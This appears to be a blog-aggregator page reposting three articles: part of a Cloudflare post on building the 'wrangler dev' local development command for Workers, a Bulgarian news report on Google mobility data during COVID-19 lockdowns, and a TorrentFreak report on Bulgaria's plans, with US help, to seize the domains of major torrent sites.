As my project evolved, it became clear that I needed to leave the Workers editor behind. Anything more than a one-off script tends to require JavaScript modules and multiple files. I spent some time setting up a local development environment for myself with npm and webpack (see, purgatory: a place or state of temporary suffering. merriam-webster.com).

After I finally got everything working, my iteration cycle looked a bit like this:

  1. Make a change to my code
  2. Run npm run build (which ran webpack and bundled my code in a single script)
  3. Open ./dist/worker.min.js (the output from my build step)
  4. Copy the entire contents of the built Worker to my clipboard
  5. Switch to the Cloudflare Workers Dashboard
  6. Paste my script into the Workers editor
  7. Click update
  8. Investigate the behavior of my recently modified script
  9. Rinse and repeat

There were two main things here that were decidedly not a fantastic developer experience:

  1. Inspecting the value of a variable by adding a console.log statement would take me ~2-3 minutes and involved lots of manual steps to perform a full rebuild.
  2. I was unable to use familiar HTTP clients such as cURL and Postman without deploying to production. This was because the Workers Preview UI was an iframe nested in the dashboard.

Luckily for me, Cloudflare Workers deploy globally incredibly quickly, so I could push the latest iteration of my Worker, wait just a few seconds for it to go live, and cURL away.

A Better Workers Developer Experience in 2019

Shortly after we shipped AMP Real URL, Cloudflare released Wrangler, the official CLI tool for developing Workers, and I was hired full time to work on it. Wrangler came with a feature that automated steps 2-7 of my workflow by running the command wrangler preview, which was a significant improvement. Running the command would build my Worker and open the browser automatically for me so I could see log messages and test out HTTP requests. That summer, our intern Matt Alonso created wrangler preview --watch. This command automatically updates the Workers preview window when changes are made to your code. You can read more about that here. This was, yet again, another improvement over my old friend Build and Open and Copy and Switch Windows and Paste Forever and Ever, Amen. But there was still no way that I could test my Worker with any HTTP client I wanted without deploying to production — I was still locked in to using the nested iframe.

A few months ago we decided it was time to do something about it. To the whiteboard!

Enter wrangler dev

Most web developers are familiar with developing their applications on localhost, and since Wrangler is written in Rust, it means we could start up a server on localhost that would handle requests to a Worker. The idea was to somehow start a server on localhost and then transform incoming requests and send them off to a preview session running on a Cloudflare server.

Proof of Concept

What we came up with ended up looking a little something like this — when a developer runs wrangler dev, do the following:

Trailblazing a Development Environment for Workers

  1. Build the Worker
  2. Upload the Worker via the Cloudflare API as a previewable Worker
  3. The Cloudflare API takes the uploaded script and creates a preview session, and returns an access token
  4. Start listening for incoming HTTP requests at localhost:8787

Top secret fact: 8787 spells out Rust on a phone numpad Happy Easter!

  1. All incoming requests to localhost:8787 are modified:

  • All headers are prepended with cf-ew-raw- (for instance, X-Auth-Header would become cf-ew-raw-X-Auth-Header)
  • The URL is changed to https://rawhttp.cloudflareworkers.com/${path}
  • The Host header is changed to rawhttp.cloudflareworkers.com
  • The cf-ew-preview header is added with the access token returned from the API in step 3

  1. After sending this request, the response is modified

  • All headers not prefixed with cf-ew-raw- are discarded and headers with the prefix have it removed (for instance, cf-ew-raw-X-Auth-Success would become X-Auth-Success)

The hard part here was already done — the Workers Core team had already implemented the API to support the Preview UI. We just needed to gently nudge Wrangler and the API to be the best of friends. After some investigation into Rust’s HTTP ecosystem, we settled on using the HTTP library hyper, which I highly recommend if you’re in need of a low level HTTP library — it’s fast, correct, and the ergonomics are constantly improving. After a bit of work, we got a prototype working and carved Wrangler ❤️ Cloudflare API into the old oak tree down by Lady Bird Lake.

Usage

Let’s say I have a Workers script that looks like this:

addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  let message = "Hello, World!"
  return new Response(message)
}

If I created a Wrangler project with this code and ran wrangler dev, this is what it looked like:

$ wrangler dev
👂  Listening on http://127.0.0.1:8787

In another terminal session, I could run the following:

$ curl localhost:8787
Hello, World!

It worked! Hooray!

Just the Right Amount of Scope Creep

At this point, our initial goal was complete: any HTTP client could test out a Worker before it was deployed. However, wrangler dev was still missing crucial functionality. When running wrangler preview, it’s possible to view console.log output in the browser editor. This is incredibly useful for debugging Workers applications, and something with a name like wrangler dev should include a way to view those logs as well. “This will be easy,” I said, not yet knowing what I was signing up for. Buckle up!

console.log, V8, and the Chrome Devtools Protocol, Oh My!

My first goal was to get a Hello, World! message streamed to my terminal session so that developers can debug their applications using wrangler dev. Let’s take the script from earlier and add a console.log statement to it:

addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request))
})

async function handleRequest(request) {
  let message = "Hello, World!"
  console.log(message) // this line is new
  return new Response(message)
}

If you’d like to follow along, you can paste that script into the editor at cloudflareworkers.com using Google Chrome.

This is what the Preview editor looks like when that script is run:

Trailblazing a Development Environment for Workers

You can see that Hello, World! has been printed to the console. This may not be the most useful example, but in more complex applications logging different variables is helpful for debugging. If you’re following along, try changing console.log(message) to something more interesting, like console.log(request.url).

The console may look familiar to you if you’re a web developer because it’s the same interface you see when you open the Developer Tools in Google Chrome. Since Cloudflare Workers is built on top of V8 (more info about that here and here), the Workers runtime is able to create a WebSocket that speaks the Chrome Devtools Protocol. This protocol allows the client (your browser, Wrangler, or anything else that supports WebSockets) to send and receive messages that contain information about the script that is running.

In order to see the messages that are being sent back and forth between our browser and the Workers runtime:

  1. Open Chrome Devtools
  2. Click the Network tab at the top of the inspector
  3. Click the filter icon underneath the Network tab (it looks like a funnel and is nested between the cancel icon and the search icon)
  4. Click WS to filter out all requests but WebSocket connections

Your inspector should look like this:

Trailblazing a Development Environment for Workers

Then, reload the page, and select the /inspect item to view its messages. It should look like this:

Trailblazing a Development Environment for Workers

Hey look at that! We can see messages that our browser sent to the Workers runtime to enable different portions of the developer tools for this Worker, and we can see that the runtime sent back our Hello, World! Pretty cool!

On the Wrangler side of things, all we had to do to get started was initialize a WebSocket connection for the current Worker, and send a message with the method Runtime.enable so the Workers runtime would enable the Runtime domain and start sending console.log messages from our script.

After those initial steps, it quickly became clear that a lot more work was needed to get to a useful developer tool. There’s a lot that goes into the Chrome Devtools Inspector and most of the libraries for interacting with it are written in languages other than Rust (which we use for Wrangler). We spent a lot of time switching WebSocket libraries due to incompatibilities across operating systems (turns out TLS is hard) and implementing the part of the Chrome Devtools Protocol in Rust that we needed to. There’s a lot of work that still needs to be done in order to make wrangler dev a top notch developer tool, but we wanted to get it into the hands of developers as quickly as possible.

Try it Out!

wrangler dev is currently in alpha, and we’d love it if you could try it out! You should first check out the Quick Start and then move on to wrangler dev. If you run into issues or have any feedback, please let us know!

Signing Off

I’ve come a long way from where I started in 2018 and so has the Workers ecosystem. It’s been awesome helping to improve the developer experience of Workers for future interns, internal Cloudflare teams, and of course our customers. I can’t wait to see what we do next. I have some ideas for what’s next with Wrangler, so stay posted!

P.S. Wrangler is also open source, and we are more than happy to field bug reports, feedback, and community PRs. Check out our Contribution Guide if you want to help out!

Според данни за мобилността от Google: Българите са най-мобилни на Балканите в условията на строги ограничения

Post Syndicated from Атанас Чобанов original https://bivol.bg/bulgaria-balkans-google-mobility.html

петък 3 април 2020


Насред тежките ограничения заради пандемията от COVID-19, мобилността на българските граждани е намаляла най-малко в сравнение със съседните страни, показват данни разпространени от Google.

Данните са от геолокализацията на мобилни устройства и са анонимизирани. Те обхващат периода от 16 февруари до 29 март и са предоставени публично, за да могат правителствата да се информират за реалното положение със спазването на карантинните мерки – твърдят от световния интернет гигант.

Мобилността в България според данните на Google към 29 март.

Мобилността е разделена на три категории – Шопинг и развлечения (Retail & recreation)  или посещения в търговски центрове, кафенета, ресторанти, музеи, кина и атракциони; Хранителни стоки и аптеки (Grocery & pharmacy) или посещения в магазини за хранителни стоки, пазари и аптеки; Паркове (Parks) или посещения на паркове, градини и плажове. Данните са обобщени като разлика в проценти на посещаемост спрямо периода преди ограничителните мерки.

Дисциплината на българите в категориите “Развлечения” и “Пазаруване” е най-зле на Балканите, а в категорията “Паркове” е по-добре единствено от Босна и Херцеговина, показва сравнението на данните за различни страни, направено от Биволъ. Това заключение е условно, тъй като за Албания и Сърбия не са налични данни към този момент.

Шопинг и развлечения

Пазаруване и аптеки

Паркове

Всъщност България стои много по-близо до Нидерландия, където режимът на ограниченията е по-либерален. На Балканите шампион и в трите категории е Румъния. Без изненади, в Европа класацията по намалена мобилност се оглавява от най-засегнатите Италия и Испания.

Една от интерпретациите на тези данни е, че строгите мерки за ограничаване на социалната и физичска отдалеченост в България не се спазват. Ниска дисциплина в това отношение демонстрираха и българските народни представители, които преди два дни се наредиха на опашка за тестване от COVID-19 в две столични болници. На снимките, разпространени в медиите се вижда, че те не съблюдават регламентираната дистанция от метър и половина.

Снимка: Димитър Кьосермарлиев, Bulgaria ON AIR

Bulgaria Plans to Take Down Top Torrent Sites, with U.S. Assistance

Post Syndicated from Ernesto original https://torrentfreak.com/bulgaria-plans-to-take-down-top-torrent-sites-with-u-s-assistance-200403/

Last year, Bulgarian authorities carried out several sting operations to take down key players in the IPTV piracy ecosystem. It also provided key assistance in the police action against Xtream Codes.

The country’s increased efforts to protect copyright holders haven’t gone unnoticed in the United States. The U.S. Trade Representative (USTR) previously removed Bulgaria from their ‘Special 301 Watch List’ and the country hopes to keep it that way.

This week, TorrentFreak obtained a transcript from the most recent hearing on the 2020 Special 301 review. The Government of Bulgaria also sent a representative to the meeting, Ivo Konstantinov, who informed the USTR about the country’s continued progress.

In addition to mentioning IPTV sting operations and legislative developments, Konstantinov stressed that more work has to be done. Specifically, Bulgaria is working on shutting down several major torrent sites with help from U.S. law enforcement.

“Most important of all, the elephant in our room are two of the largest torrent tracking servers that are operating in our country, whose servers are outside of the country,” Bulgaria’s representative said.

“[O]ur National Police and Combat Organized Crime Unit is preparing requests for legal assistance from the U.S. side to deface them and take them down from their host services, which are here in the United States.”

Konstantinov informed the USTR that “this is coming.” No concrete dates were given but the authorities are also working on indictments, which suggests that criminal prosecutions may follow as well.

During the hearing, no websites were mentioned. However, we managed to track down several USTR filings from earlier this year which identify the two trackers as Zamunda.net and ArenaBG. Both sites are among the top 25 most-visited websites in Bulgaria.

In one document the Bulgarian Government states that it intends to “terminate the activities of the Zamunda and Arena.bg torrent trackers,” adding that “5 pre-trial proceedings were opened” for “intellectual property and tax crimes.”

Bulgaria states that U.S. assistance is required as the sites in question use American services. This includes their domain names. Zamunda currently has a .net domain and ArenaBG operates from a .com domain, for example. Both are maintained by Verisign, which is based in the US.

The domains can also be targeted by going to ICANN, which oversees the entire domain name ecosystem. This route is also covered, as the Bulgarian Prosecutor’s Office and the Organized Crime Unit will request ICANN to withdraw the associated domain names.

Yet more pieces of the puzzle fell into place when we stumbled upon another document the Bulgarian Government sent to the USTR. This shows that the U.S. Department of Justice is already actively involved and that more sites are being targeted.

The document references a business trip Bulgarian representatives made to the US last October. These officials met with US law enforcement and businesses, discussing potential anti-piracy actions.

These actions include domain seizures relating to four websites. The aforementioned Zamunda.net and ArenaBG.com, but also Zelka.org and RarBG.to. The latter is a major target, as it’s one of the most-used torrent sites worldwide.

During the trip, Matthew Lamberti from the US Department of Justice agreed to help, under the mutual legal assistance treaty, to seize the associated domain names.

“During the meeting with Mat Lamberti an agreement was reached that an MLAT will be sent by our country, regarding initiated pre-trials concerning four torrent trackers – with the aim of seizing domains, registered in the USA,” the document reads.

If all goes well, Bulgaria will also enlist assistance from other countries to seize any other associated domain names, including mirrors.

“If the planned procedure is successful and the domains are seized, our country intends to send the MPP to the other countries where the mirror domains of the above are registered.”

Bulgaria also mentioned that Cloudflare, a US-based company, is used by most of the top torrent sites in the world. The sites use the CDN provider to “conceal the actual location” of these “criminalized Internet resources.”

During the USTR meeting in Washington, Konstantinov mentioned that Cloudflare is cooperative as it helps to identify the sites’ true hosting locations. It’s now up to Bulgaria and the US to get the paperwork sorted, so domain names and possibly servers can be seized and shut down, he added.

The documents are remarkable, as they lay out in detail how Bulgaria and the US are working together to try and take down several top torrent sites. All the quotes and references, while not easy to find, have been made public by the USTR itself.

In some instances, the paperwork refers to ‘Arena.bg’ and ‘Rar.bg’ instead of ArenaBG.com and RarBG.to. While that’s confusing, the latter two are the largest sites by far and likely the main targets.

Finally, it’s interesting to note that, in this case, Bulgaria needs assistance from the US to shut target popular pirate sites. Especially, when taking into account that the US frequently points to lacking enforcement actions in other countries.

All in all, we can say that the documents clearly lay out the playbook to target the four torrent sites, but thus far, all targets are still operating as usual.

The transcript from the USTR hearing is available here (pdf) and the additional documents that were sent to the USTR can be found here (pdf) and here (pdf).

Drom: TF, for the latest news on copyright battles, torrent sites and more. We also have an annual VPN review.

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close